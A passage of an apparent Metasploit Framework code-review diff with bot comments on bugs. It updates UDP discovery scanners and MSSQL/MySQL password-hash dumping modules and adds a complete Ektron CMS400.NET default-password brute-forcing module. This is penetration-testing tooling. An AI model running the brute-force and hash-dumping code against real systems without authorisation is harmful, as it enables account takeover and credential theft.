+ pcap.setfilter("tcp and tcp[13] == 18 and not host #{ip} and src port #{p.tcp_dst} and dst port #{p.tcp_src} and #{ackbpf}")
+ capture_sendto(p, ip)
+ reply = probe_reply(pcap, to)
+ next if reply.nil?
+
+ print_status("[BNAT RESPONSE] Requested IP: #{ip} Responding IP: #{reply.ip_saddr} Port: #{reply.tcp_src}")
+ end
+
+ close_pcap
+
end
end
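Review bot: `generate_probe` picks a random `@flavor` but never passes it to `PacketFu::TCPPacket.new`, so unlike the removed code the probe's TCP fingerprint no longer varies; either pass it, `p = PacketFu::TCPPacket.new(:config => config, :flavor => @flavor)`, or drop the two lines. The literal `%w{windows, linux, freebsd}` also carries the commas into the strings (`"windows,"`, `"linux,"`), an error inherited from the removed code; `%w{windows linux freebsd}` is what was meant. In `run_host`, `close_pcap` is skipped if anything between `open_pcap` and it raises, so the port loop belongs in `begin ... ensure close_pcap end`; the `i` of `each_with_index` is unused (`ports.each do |port|`), and `p` as a local name shadows `Kernel#p`.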
4 modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb
@@ -73,12 +73,12 @@ def initialize
def get_pkt
buf = sock.get
- print_status("[in ] #{buf.inspect}") if datastore['VERBOSE']
+ vprint_status("[in ] #{buf.inspect}")
buf
end
def send_pkt(pkt, get_resp = false)
- print_status("[out] #{pkt.inspect}") if datastore['VERBOSE']
+ vprint_status("[out] #{pkt.inspect}")
sock.put(pkt)
get_pkt if get_resp
end
2  modules/auxiliary/gather/natpmp_external_address.rb
@@ -10,7 +10,7 @@ def initialize
super(
'Name' => 'NAT-PMP External address scanner',
'Description' => 'Scan NAT devices for their external address using NAT-PMP',
- 'Author' => 'jhart@spoofed.org',
+ 'Author' => 'Jon Hart <jhart[at]spoofed.org>',
'License' => MSF_LICENSE
)
118 modules/auxiliary/scanner/discovery/udp_probe.rb
@@ -51,6 +51,8 @@ def initialize
@probes << 'probe_pkt_sentinel'
@probes << 'probe_pkt_db2disco'
@probes << 'probe_pkt_citrix'
+ @probes << 'probe_pkt_pca_st'
+ @probes << 'probe_pkt_pca_nq'
end
@@ -64,7 +66,7 @@ def setup
# Fingerprint a single host
def run_host(ip)
-
+ @results = {}
@thost = ip
begin
@@ -103,7 +105,33 @@ def run_host(ip)
rescue ::Interrupt
raise $!
rescue ::Exception => e
- print_error("Unknown error: #{@thost}:#{@tport} #{e.class} #{e}")
+ print_error("Unknown error: #{@thost}:#{@tport} #{e.class} #{e} #{e.backtrace}")
+ end
+
+ @results.each_key do |k|
+ next if not @results[k].respond_to?('keys')
+ data = @results[k]
+
+ next unless inside_workspace_boundary?(data[:host])
+
+ conf = {
+ :host => data[:host],
+ :port => data[:port],
+ :proto => 'udp',
+ :name => data[:app],
+ :info => data[:info]
+ }
+
+ if data[:hname]
+ conf[:host_name] = data[:hname].downcase
+ end
+
+ if data[:mac]
+ conf[:mac] = data[:mac].downcase
+ end
+
+ report_service(conf)
+ print_status("Discovered #{data[:app]} on #{k} (#{data[:info]})")
end
end
@@ -112,9 +140,7 @@ def run_host(ip)
# The response parsers
#
def parse_reply(pkt)
-
- @results ||= {}
-
+
# Ignore "empty" packets
return if not pkt[1]
@@ -122,15 +148,69 @@ def parse_reply(pkt)
pkt[1] = pkt[1].sub(/^::ffff:/, '')
end
- # Ignore duplicates
- hkey = "#{pkt[1]}:#{pkt[2]}"
- return if @results[hkey]
-
app = 'unknown'
inf = ''
maddr = nil
hname = nil
+ hkey = "#{pkt[1]}:#{pkt[2]}"
+
+ # Work with protocols that return different data in different packets
+ # These are reported at the end of the scanning loop to build state
+ case pkt[2]
+ when 5632
+
+ @results[hkey] ||= {}
+ data = @results[hkey]
+
+ data[:app] = "pcAnywhere"
+ data[:port] = pkt[2]
+ data[:host] = pkt[1]
+
+ case pkt[0]
+
+ when /^NR(........................)(........)/
+ name = $1.dup
+ caps = $2.dup
+ name = name.gsub(/_+$/, '').gsub("\x00", '').strip
+ caps = caps.gsub(/_+$/, '').gsub("\x00", '').strip
+ data[:name] = name
+ data[:caps] = caps
+
+ when /^ST(.+)/
+ buff = $1.dup
+ stat = 'Unknown'
+
+ if buff[2,1].unpack("C")[0] == 67
+ stat = "Available"
+ end
+
+ if buff[2,1].unpack("C")[0] == 11
+ stat = "Busy"
+ end
+
+ data[:stat] = stat
+ end
+
+ if data[:name]
+ inf << "Name: #{data[:name]} "
+ end
+
+ if data[:stat]
+ inf << "- #{data[:stat]} "
+ end
+
+ if data[:caps]
+ inf << "( #{data[:caps]} ) "
+ end
+ data[:info] = inf
+ end
+
+
+
+ # Ignore duplicates for the protocols below
+ return if @results[hkey]
+
case pkt[2]
when 53
@@ -146,6 +226,7 @@ def parse_reply(pkt)
ver = pkt[0].unpack('H*')[0] if not ver
inf = ver if ver
+ @results[hkey] = true
when 137
app = 'NetBIOS'
@@ -190,6 +271,8 @@ def parse_reply(pkt)
hname = names[0][0]
end
end
+
+ @results[hkey] = true
when 111
app = 'Portmap'
@@ -209,6 +292,7 @@ def parse_reply(pkt)
)
end
inf = svc.join(", ")
+ @results[hkey] = true
when 123
app = 'NTP'
@@ -219,12 +303,14 @@ def parse_reply(pkt)
ver = 'NTP v4 (unsynchronized)' if (ver =~ /^e40/)
ver = 'Microsoft NTP' if (ver =~ /^dc00|^dc0f/)
inf = ver if ver
+ @results[hkey] = true
when 1434
app = 'MSSQL'
mssql_ping_parse(pkt[0]).each_pair { |k,v|
inf += k+'='+v+' '
}
+ @results[hkey] = true
when 161
app = 'SNMP'
@@ -243,20 +329,25 @@ def parse_reply(pkt)
inf = snmp_info
com = snmp_comm
+ @results[hkey] = true
when 5093
app = 'Sentinel'
+ @results[hkey] = true
when 523
app = 'ibm-db2'
inf = db2disco_parse(pkt[0])
+ @results[hkey] = true
when 1604
app = 'citrix-ica'
return unless citrix_parse(pkt[0])
-
+ @results[hkey] = true
+
end
+ return unless inside_workspace_boundary?(pkt[1])
report_service(
:host => pkt[1],
:mac => (maddr and maddr != '00:00:00:00:00:00') ? maddr : nil,
@@ -419,6 +510,13 @@ def probe_pkt_citrix(ip) # Server hello packet from citrix_published_bruteforce
return [data, 1604]
end
+ def probe_pkt_pca_st(ip)
+ return ["ST", 5632]
+ end
+
+ def probe_pkt_pca_nq(ip)
+ return ["NQ", 5632]
+ end
end
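Review bot: In the pcAnywhere `when /^ST(.+)/` branch, `buff[2,1]` is nil when the captured text is a single byte (`"a"[2,1]` is nil), so `.unpack("C")` raises NoMethodError and the reply is lost to the generic rescue in `run_host`; guard with `if buff.length > 2` and read the byte once, `code = buff[2,1].unpack("C")[0]`, rather than unpacking it in both comparisons. The pcAnywhere parsing block and the end-of-run `@results.each_key` reporting loop are duplicated verbatim in udp_sweep.rb in this same commit, so both belong in a helper shared by the two modules. `#{e.backtrace}` in the error message interpolates an Array; `e.backtrace.join("\n")` prints it readably. `parse_reply` and `run_host` both begin outside the hunks shown.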
122 modules/auxiliary/scanner/discovery/udp_sweep.rb
@@ -52,7 +52,9 @@ def initialize
@probes << 'probe_pkt_sentinel'
@probes << 'probe_pkt_db2disco'
@probes << 'probe_pkt_citrix'
-
+ @probes << 'probe_pkt_pca_st'
+ @probes << 'probe_pkt_pca_nq'
+
end
def setup
@@ -71,6 +73,8 @@ def run_batch_size
# Fingerprint a single host
def run_batch(batch)
+ @results = {}
+
print_status("Sending #{@probes.length} probes to #{batch[0]}->#{batch[-1]} (#{batch.length} hosts)")
begin
@@ -135,6 +139,33 @@ def run_batch(batch)
rescue ::Exception => e
print_error("Unknown error: #{e.class} #{e}")
end
+
+ @results.each_key do |k|
+ next if not @results[k].respond_to?('keys')
+ data = @results[k]
+
+ next unless inside_workspace_boundary?(data[:host])
+
+ conf = {
+ :host => data[:host],
+ :port => data[:port],
+ :proto => 'udp',
+ :name => data[:app],
+ :info => data[:info]
+ }
+
+ if data[:hname]
+ conf[:host_name] = data[:hname].downcase
+ end
+
+ if data[:mac]
+ conf[:mac] = data[:mac].downcase
+ end
+
+ report_service(conf)
+ print_status("Discovered #{data[:app]} on #{k} (#{data[:info]})")
+ end
+
end
@@ -142,7 +173,6 @@ def run_batch(batch)
# The response parsers
#
def parse_reply(pkt)
- @results ||= {}
# Ignore "empty" packets
return if not pkt[1]
@@ -153,12 +183,67 @@ def parse_reply(pkt)
# Ignore duplicates
hkey = "#{pkt[1]}:#{pkt[2]}"
- return if @results[hkey]
+
app = 'unknown'
inf = ''
maddr = nil
hname = nil
+
+
+ # Work with protocols that return different data in different packets
+ # These are reported at the end of the scanning loop to build state
+ case pkt[2]
+ when 5632
+
+ @results[hkey] ||= {}
+ data = @results[hkey]
+
+ data[:app] = "pcAnywhere"
+ data[:port] = pkt[2]
+ data[:host] = pkt[1]
+
+ case pkt[0]
+
+ when /^NR(........................)(........)/
+ name = $1.dup
+ caps = $2.dup
+ name = name.gsub(/_+$/, '').gsub("\x00", '').strip
+ caps = caps.gsub(/_+$/, '').gsub("\x00", '').strip
+ data[:name] = name
+ data[:caps] = caps
+
+ when /^ST(.+)/
+ buff = $1.dup
+ stat = 'Unknown'
+
+ if buff[2,1].unpack("C")[0] == 67
+ stat = "Available"
+ end
+
+ if buff[2,1].unpack("C")[0] == 11
+ stat = "Busy"
+ end
+
+ data[:stat] = stat
+ end
+
+ if data[:name]
+ inf << "Name: #{data[:name]} "
+ end
+
+ if data[:stat]
+ inf << "- #{data[:stat]} "
+ end
+
+ if data[:caps]
+ inf << "( #{data[:caps]} ) "
+ end
+ data[:info] = inf
+ end
+
+ # Ignore duplicates
+ return if @results[hkey]
case pkt[2]
@@ -175,6 +260,8 @@ def parse_reply(pkt)
ver = pkt[0].unpack('H*')[0] if not ver
inf = ver if ver
+
+ @results[hkey] = true
when 137
app = 'NetBIOS'
@@ -219,6 +306,8 @@ def parse_reply(pkt)
hname = names[0][0]
end
end
+
+ @results[hkey] = true
when 111
app = 'Portmap'
@@ -239,6 +328,8 @@ def parse_reply(pkt)
)
end
inf = svc.join(", ")
+
+ @results[hkey] = true
when 123
app = 'NTP'
@@ -249,6 +340,8 @@ def parse_reply(pkt)
ver = 'NTP v4 (unsynchronized)' if (ver =~ /^e40/)
ver = 'Microsoft NTP' if (ver =~ /^dc00|^dc0f/)
inf = ver if ver
+
+ @results[hkey] = true
when 1434
app = 'MSSQL'
@@ -256,6 +349,8 @@ def parse_reply(pkt)
inf += k+'='+v+' '
}
+ @results[hkey] = true
+
when 161
app = 'SNMP'
asn = OpenSSL::ASN1.decode(pkt[0]) rescue nil
@@ -273,20 +368,25 @@ def parse_reply(pkt)
inf = snmp_info
com = snmp_comm
+ @results[hkey] = true
+
when 5093
app = 'Sentinel'
-
+ @results[hkey] = true
+
when 523
-
app = 'ibm-db2'
inf = db2disco_parse(pkt[0])
-
+ @results[hkey] = true
+
when 1604
app = 'citrix-ica'
return unless citrix_parse(pkt[0])
+ @results[hkey] = true
end
+ return unless inside_workspace_boundary?(pkt[1])
report_service(
:host => pkt[1],
:mac => (maddr and maddr != '00:00:00:00:00:00') ? maddr : nil,
@@ -299,7 +399,6 @@ def parse_reply(pkt)
)
print_status("Discovered #{app} on #{pkt[1]}:#{pkt[2]} (#{inf})")
-
end
#
@@ -448,7 +547,14 @@ def probe_pkt_citrix(ip) # Server hello packet from citrix_published_bruteforce
"\x00\x00\x00\x00"
return [data, 1604]
end
-
+
+ def probe_pkt_pca_st(ip)
+ return ["ST", 5632]
+ end
+
+ def probe_pkt_pca_nq(ip)
+ return ["NQ", 5632]
+ end
end
161 modules/auxiliary/scanner/http/ektron_cms400net.rb
@@ -0,0 +1,161 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::AuthBrute
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Ektron CMS400.NET Default Password Scanner',
+ 'Description' => %q{
+ Ektron CMS400.NET is a web content management system based on .NET.
+ This module tests for installations that are utilizing default
+ passwords set by the vendor. Additionally, it has the ability
+ to brute force user accounts. Note that Ektron CMS400.NET, by
+ default, enforces account lockouts for regular user account
+ after a number of failed attempts.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => ['Justin Cacak']
+ ))
+
+ register_options(
+ [
+ #Set to false to prevent account lockouts - it will!
+ OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]),
+ OptString.new('URI', [true, "Path to the CMS400.NET login page", '/WorkArea/login.aspx']),
+ OptPath.new(
+ 'USERPASS_FILE',
+ [
+ false,
+ "File containing users and passwords",
+ File.join(Msf::Config.install_root, "data", "wordlists", "cms400net_default_userpass.txt")
+ ])
+ ], self.class)
+ end
+
+ def target_url
+ #Function to display correct protocol and host/vhost info
+ if rport == 443 or ssl
+ proto = "https"
+ else
+ proto = "http"
+ end
+
+ if vhost != ""
+ "#{proto}://#{vhost}:#{rport}#{datastore['URI'].to_s}"
+ else
+ "#{proto}://#{rhost}:#{rport}#{datastore['URI'].to_s}"
+ end
+ end
+
+ def run_host(ip)
+ begin
+ res = send_request_cgi(
+ {
+ 'method' => 'GET',
+ 'uri' => datastore['URI']
+ }, 20)
+
+ #Check for HTTP 200 response.
+ #Numerous versions and configs make if difficult to further fingerprint.
+ if (res.code == 200)
+ print_status("Ektron CMS400.NET install found at #{target_url} [HTTP 200]")
+
+ #Gather __VIEWSTATE and __EVENTVALIDATION from HTTP response.
+ #Required to be sent based on some versions/configs.
+ begin
+ viewstate = res.body.scan(/<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="(.*)"/)[0][0]
+ rescue
+ viewstate = ""
+ end
+
+ begin
+ eventvalidation = res.body.scan(/<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="(.*)"/)[0][0]
+ rescue
+ eventvalidation = ""
+ end
+
+ GetVersion()
+
+ print_status "Testing passwords at #{target_url}"
+ each_user_pass { |user, pass|
+ do_login(user, pass, viewstate, eventvalidation)
+ }
+ else
+ print_error("Ektron CMS400.NET login page not found at #{target_url}. May need to set VHOST or RPORT. [HTTP #{res.code}]")
+ end
+
+ rescue
+ print_error ("Ektron CMS400.NET login page not found at #{target_url} [HTTP #{res.code}]")
+ return
+ end
+ end
+
+ def GetVersion
+ #Attempt to retrieve the version of CMS400.NET installed.
+ #Not always possible based on version/config.
+ payload = "http://#{vhost}:#{rport}/WorkArea/java/ektron.site-data.js.ashx"
+ res = send_request_cgi(
+ {
+ 'method' => 'GET',
+ 'uri' => payload
+ }, 20)
+
+ if (res.body.match(/Version.:.(\d{1,3}.\d{1,3})/))
+ print_status "Ektron CMS400.NET version: #{$1}"
+ end
+ end
+
+ def do_login(user=nil, pass=nil, viewstate=viewstate, eventvalidation=eventvalidation)
+ vprint_status("#{target_url} - Trying: username:'#{user}' with password:'#{pass}'")
+
+ post_data = "__VIEWSTATE=#{Rex::Text.uri_encode(viewstate.to_s)}"
+ post_data << "&__EVENTVALIDATION=#{Rex::Text.uri_encode(eventvalidation.to_s)}"
+ post_data << "&username=#{Rex::Text.uri_encode(user.to_s)}"
+ post_data << "&password=#{Rex::Text.uri_encode(pass.to_s)}"
+
+ begin
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => datastore['URI'],
+ 'data' => post_data,
+ }, 20)
+
+ if (res and res.code == 200 and res.body.to_s.match(/LoginSuceededPanel/i) != nil)
+ print_good("#{target_url} [Ektron CMS400.NET] Successful login: '#{user}' : '#{pass}'")
+ report_auth_info(
+ :host => rhost,
+ :port => rport,
+ :sname => 'http',
+ :user => user,
+ :pass => pass,
+ :proof => "WEBAPP=\"Ektron CMS400.NET\", VHOST=#{vhost}",
+ :source_type => "user_supplied",
+ :duplicate_ok => true,
+ :active => true
+ )
+
+ elsif(res and res.code == 200)
+ vprint_error("#{target_url} [Ekton CMS400.NET] - Failed login as: '#{user}'")
+ else
+ print_error("#{target_url} [Error] Unable to authenticate. Check parameters. [HTTP #{res.code}]")
+ return :abort
+ end
+
+ rescue ::Rex::ConnectionError => e
+ vprint_error("http://#{tartget_url} - #{e.to_s}")
+ return :abort
+ end
+
+ end
+
+end
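Review bot: `do_login` cannot report a connection error because of the typo `tartget_url` in `vprint_error("http://#{tartget_url} - #{e.to_s}")`, which raises NameError inside the rescue; it should read `vprint_error("#{target_url} - #{e.to_s}")` (the `http://` prefix is redundant, since `target_url` already carries the scheme). The defaults `viewstate=viewstate, eventvalidation=eventvalidation` are self-referential and evaluate to nil, so `viewstate=nil, eventvalidation=nil` expresses the same thing without the circular reference. In `run_host`, `send_request_cgi` can return nil when no response arrives; `res.code` at `if (res.code == 200)` then raises inside the `begin`, and the bare `rescue` dereferences `res.code` again in its own message, so the NoMethodError escapes — guard with `if res and res.code == 200` and print `res ? res.code : 'no response'` in the rescue. `GetVersion` passes an absolute URL as the `'uri'` of `send_request_cgi`, whereas the rest of the module passes a path (`datastore['URI']`); `/WorkArea/java/ektron.site-data.js.ashx` is likely what was meant, and its `res.body` has the same nil risk.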
2  modules/auxiliary/scanner/http/tomcat_enum.rb
@@ -48,7 +48,7 @@ def initialize
Opt::RPORT(8080),
OptString.new('URI', [true, 'The path of the Apache Tomcat Administration page', '/admin/j_security_check']),
OptPath.new('USER_FILE', [ true, "File containing users, one per line",
- File.join(Msf::Config.install_root, "data", "wordlists", "unix_users.txt") ]),
+ File.join(Msf::Config.install_root, "data", "wordlists", "tomcat_mgr_default_users.txt") ]),
], self.class)
deregister_options('PASSWORD','PASS_FILE','USERPASS_FILE','STOP_ON_SUCCESS','BLANK_PASSWORDS','USERNAME')
63 modules/auxiliary/scanner/mssql/mssql_hashdump.rb
@@ -30,7 +30,7 @@ def initialize
This module also saves information about the server version and
table names, which can be used to seed the wordlist.
},
- 'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
+ 'Author' => ['TheLightCosine <thelightcosine[at]metasploit.com>'],
'License' => MSF_LICENSE
)
end
@@ -48,60 +48,13 @@ def run_host(ip)
version = mssql_query(mssql_sql_info())[:rows][0][0]
version_year = version.split('-')[0].slice(/\d\d\d\d/)
- #Grab all the DB schema and save it as notes
- mssql_db_names = get_db_names()
- mssql_schema={}
- unless mssql_db_names.nil?
- mssql_db_names.each do |dbname|
- tmp_tblnames = get_tbl_names(dbname[0])
- unless tmp_tblnames.nil?
- mssql_schema[dbname]=[]
- tmp_tblnames.each{|tblname| mssql_schema[dbname] << tblname[0] unless tblname[0].nil?}
- end
- end
- end
mssql_hashes = mssql_hashdump(version_year)
- report_other_data(mssql_schema,{'InstanceName' => instancename, 'Version' => version} ,version_year)
unless mssql_hashes.nil?
report_hashes(mssql_hashes,version_year)
end
end
- def report_other_data(mssql_schema,instancename,version_year)
-
- unless mssql_schema.nil?
- report_note(
- :host => rhost,
- :type => "mssql.schema",
- :data => mssql_schema,
- :port => rport,
- :proto => 'tcp',
- :update => :unique_data
- )
- end
-
- unless instancename.nil?
- report_note(
- :host => rhost,
- :type => "mssql.instancename",
- :data => instancename
- )
-
- end
-
- unless version_year.nil?
- report_note(
- :host => rhost,
- :type => "mssql.version_year",
- :data => version_year,
- :port => rport,
- :proto => 'tcp',
- :update => :unique_data
- )
- end
-
- end
#Stores the grabbed hashes as loot for later cracking
#The hash format is slightly different between 2k and 2k5/2k8
@@ -161,20 +114,6 @@ def mssql_hashdump(version_year)
end
- #Gets all of the Databases on this Instance
- def get_db_names
- results = mssql_query(mssql_db_names())[:rows]
- return results
- end
-
- #Gets all the table names for the given DB
- def get_tbl_names(db_name)
- results = mssql_query("SELECT name FROM #{db_name}..sysobjects WHERE xtype = 'U'")[:rows]
- return results
- end
-
-
-
end
50 modules/auxiliary/scanner/mysql/mysql_hashdump.rb
@@ -26,7 +26,7 @@ def initialize
This module extracts the usernames and encrypted password
hashes from a MySQL server and stores them for later cracking.
},
- 'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
+ 'Author' => ['TheLightCosine <thelightcosine[at]metasploit.com>'],
'License' => MSF_LICENSE
)
end
@@ -69,21 +69,7 @@ def run_host(ip)
report_hashes(tbl.to_csv, this_service) unless tbl.rows.empty?
- #Recursively grab the schema for the entire DB server
- mysql_schema={}
- res = mysql_query("show databases")
- if res.size > 0
- res.each do |row|
- next if row[0].nil?
- next if row[0].empty?
- next if row[0]== "information_schema"
- next if row[0]== "mysql"
- next if row[0]== "performance_schema"
- next if row[0]== "test"
- mysql_schema[row[0]]= get_tbl_names(row[0])
- end
- end
- report_other_data(mysql_schema)
+
end
#Stores the Hash Table as Loot for Later Cracking
@@ -95,37 +81,5 @@ def report_hashes(hash_loot,service)
end
- #Gets all of the Tables names inside the given Database
- def get_tbl_names(dbname)
-
- tables=[]
- res = mysql_query("SHOW tables from #{dbname}")
- if res.size > 0
- res.each do |row|